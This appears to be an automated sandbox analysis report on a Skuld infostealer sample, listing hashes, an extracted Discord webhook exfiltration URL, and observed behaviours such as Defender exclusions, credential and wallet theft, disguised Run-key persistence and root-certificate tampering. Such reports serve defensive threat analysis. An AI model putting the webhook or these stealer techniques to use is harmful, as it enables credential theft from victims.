skuld | 5dc88f47dfefad9feb60493de86d4bbdd407b158f4b6c768759e726ce497754f

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 01:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Size

9.9MB
MD5

1abd63f11821dd425441e659c890632b
SHA1

e4772d6e84217f0c0ff15aa5580a13f3424d2ac0
SHA256

5dc88f47dfefad9feb60493de86d4bbdd407b158f4b6c768759e726ce497754f
SHA512

29eeab5c7c06b83f0557a375c3faf1fd868dfb2d89f2035728197a45bcb664e951fabfbb5191857beb576a8de3a009aef2f7a760d52305c14c754573e9d3b06e
SSDEEP

98304:hzU4brhxBASgf/gEpiji6Ig8TWA7EIICafZm/mbnXg:hxrhxBAGZji6IdThoRTXg

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1296197362108338248/k492vQ1I3SDXcmvWcvsy2EcSUzrwhNmILrYhR3qSF8R7tkcE-C5GgZSxuS3IlNschBWg

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5040	powershell.exe
1000	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	discord.com
16	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	api.ipify.org
4	api.ipify.org
10	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2408	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3564	wmic.exe
2892	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	11	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
5040	powershell.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
5040	powershell.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
1000	powershell.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
1000	powershell.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Token: SeIncreaseQuotaPrivilege	2448	wmic.exe
Token: SeSecurityPrivilege	2448	wmic.exe
Token: SeTakeOwnershipPrivilege	2448	wmic.exe
Token: SeLoadDriverPrivilege	2448	wmic.exe
Token: SeSystemProfilePrivilege	2448	wmic.exe
Token: SeSystemtimePrivilege	2448	wmic.exe
Token: SeProfSingleProcessPrivilege	2448	wmic.exe
Token: SeIncBasePriorityPrivilege	2448	wmic.exe
Token: SeCreatePagefilePrivilege	2448	wmic.exe
Token: SeBackupPrivilege	2448	wmic.exe
Token: SeRestorePrivilege	2448	wmic.exe
Token: SeShutdownPrivilege	2448	wmic.exe
Token: SeDebugPrivilege	2448	wmic.exe
Token: SeSystemEnvironmentPrivilege	2448	wmic.exe
Token: SeRemoteShutdownPrivilege	2448	wmic.exe
Token: SeUndockPrivilege	2448	wmic.exe
Token: SeManageVolumePrivilege	2448	wmic.exe
Token: 33	2448	wmic.exe
Token: 34	2448	wmic.exe
Token: 35	2448	wmic.exe
Token: 36	2448	wmic.exe
Token: SeIncreaseQuotaPrivilege	2448	wmic.exe
Token: SeSecurityPrivilege	2448	wmic.exe
Token: SeTakeOwnershipPrivilege	2448	wmic.exe
Token: SeLoadDriverPrivilege	2448	wmic.exe
Token: SeSystemProfilePrivilege	2448	wmic.exe
Token: SeSystemtimePrivilege	2448	wmic.exe
Token: SeProfSingleProcessPrivilege	2448	wmic.exe
Token: SeIncBasePriorityPrivilege	2448	wmic.exe
Token: SeCreatePagefilePrivilege	2448	wmic.exe
Token: SeBackupPrivilege	2448	wmic.exe
Token: SeRestorePrivilege	2448	wmic.exe
Token: SeShutdownPrivilege	2448	wmic.exe
Token: SeDebugPrivilege	2448	wmic.exe
Token: SeSystemEnvironmentPrivilege	2448	wmic.exe
